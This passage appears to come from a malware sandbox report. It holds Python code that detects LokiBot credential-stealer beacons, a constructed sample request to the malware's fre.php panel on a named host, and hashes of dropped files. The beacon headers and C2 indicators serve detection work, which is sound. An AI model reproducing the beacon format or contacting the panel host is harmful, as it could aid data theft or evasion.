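        hits.append("HTTP/1.0 octet-stream body with Content-Encoding: binary")
    return hits


def is_lokibot_beacon(req: dict, min_hits: int = 2) -> bool:
    """Require two independent indicators so that a lone fre.php path does not fire."""
    return len(lokibot_indicators(req)) >= min_hits


def build_sample(body_len: int = 358) -> bytes:
    """Constructed request: headers as captured in the report, body replaced by filler
    bytes of the reported Content-Length (the real body is the stolen data and is not
    on the page)."""
    head = ("POST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0\r\n"
            "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
            "Host: www.stipamana.com\r\n"
            "Accept: */*\r\n"
            "Content-Type: application/octet-stream\r\n"
            "Content-Encoding: binary\r\n"
            "Content-Key: 78FD62C\r\n"
            f"Content-Length: {body_len}\r\n"
            "Connection: close\r\n\r\n")
    return head.encode("ascii") + b"\x00" * body_len


SAMPLE_REQUEST = build_sample()

if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    for hit in lokibot_indicators(req):
        print("match:", hit)
    print("lokibot beacon:", is_lokibot_beacon(req))
```

The User-Agent is the single most reliable indicator here but also the easiest thing for a rebuilt sample to change, which is why is_lokibot_beacon asks for two independent indicators rather than one. An IDS rule would express the same logic as a content match on the User-Agent value and on the Content-Key header name within the HTTP request, and should alert regardless of the status code the panel returns.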

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

    Filesize

    36KB

    MD5

    b30d3becc8731792523d599d949e63f5

    SHA1

    19350257e42d7aee17fb3bf139a9d3adb330fad4

    SHA256

    b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

    SHA512

    523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

    Filesize

    56KB

    MD5

    752a1f26b18748311b691c7d8fc20633

    SHA1

    c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

    SHA256

    111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

    SHA512

    a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

  • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

    Filesize

    64KB

    MD5

    3970de482154391d7acd9b2c5ce0622c

    SHA1

    8405549bce2618575716c528e726cb98c6200ae7

    SHA256

    e3ef2399fdee9a145f7298d1f85616f8ca54ec84f82970f80747a2b86ff490b4

    SHA512

    85b6c9606fa1c8b2346ecb387c55446b774368a0919af60c84a934129c0fc03ab9c254800ba517cc6ed2e76e61ec2782dc0847447c765ce38e37d3fb0b1c0cb9

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\mts103swift.pdf

    Filesize

    43KB

    MD5

    f10334c1dc5e4aec8fffd10387397af2

    SHA1

    a520e2e581be33181af241dab80799813bda5785

    SHA256

    307dd5cbcabfcbfd86b65b45f70fb5fc349b861593b74f36ff6416dd5aa44d1e

    SHA512

    2da918d25e6c50ac2423951b161b9c84833e1d06a978043c7a2ca88952ee625e4a0d3886135d112c846159c80e4ab59862ed95e14d8de9dd3930c6232bd6aecc

  • C:\Users\Admin\AppData\Roaming\segzs.exe

    Filesize

    319KB

    MD5

    e252eca9ccf8de2f046df3b51f6a5973

    SHA1

    0541e65f3018e3edf16832c111dc7a80c46d1b89

    SHA256

    a22ebfe0be1b8df037eac93cc45c3d65b1b12b1d3a889071e52779c4dcd9dceb

    SHA512

    1bf1785b1dee97e905c85f671c829b73eeba911763dc13bafe659ba8b02b8f812ea3cdaa66b59034d1f1d7e4e0011f0b43f9e252cd30372dbd9f1eb675360cdc

  • C:\Users\Admin\AppData\Roaming\segzs.sfx.exe

    Filesize

    555KB

    MD5

    0be398a8808083c20b84daf04d18dee0

    SHA1

    718959fa4ec118470293016ffbc6f5afde595641

    SHA256

    967f6cf0fd1e698deb0cfedf0d017bd1d0c0240f7b8cb654467264d8a17c7e31

    SHA512

    4f42c66f6ea15cdaefad1f7d8daf528301dd3eaa4e5c6148c4d5dd7e2e9bc86817968bf692218c3f82c6bf49e496f48ba7e287419cd5add3e38f2d20eeaf8b8d

  • C:\Users\Admin\AppData\Roaming\sfgdf.bat

    Filesize

    18KB

    MD5

    9c3544830a2edeb178eb4082bf7875e0

    SHA1

    000eec764808b31eb32156ec23061060ec7747a6

    SHA256

    6c69d201f7e4eddf329fedf5184c8d8976ce89cc06442f2e6a225a79c7640516

    SHA512

    3a27c3ae65e4c49af8b43e9d7f0e6a2fcd92d29026306af50005163ff33bf44cd2640c3543c61bd44f7dbfd8d6d072f133a07aed5ce8b7a3bfbc501d8e233680

  • memory/3024-35-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3024-61-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/3024-33-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/5104-26-0x0000000000940000-0x0000000000996000-memory.dmp

    Filesize

    344KB

  • memory/5104-32-0x00000000051E0000-0x00000000051E6000-memory.dmp

    Filesize

    24KB

  • memory/5104-31-0x00000000053B0000-0x0000000005442000-memory.dmp

    Filesize

    584KB

  • memory/5104-30-0x0000000009D80000-0x000000000A324000-memory.dmp

    Filesize

    5.6MB

  • memory/5104-29-0x0000000009730000-0x00000000097CC000-memory.dmp

    Filesize

    624KB

  • memory/5104-28-0x0000000002AC0000-0x0000000002B1E000-memory.dmp

    Filesize

    376KB

  • memory/5104-27-0x0000000002BA0000-0x0000000002BA6000-memory.dmp

    Filesize

    24KB
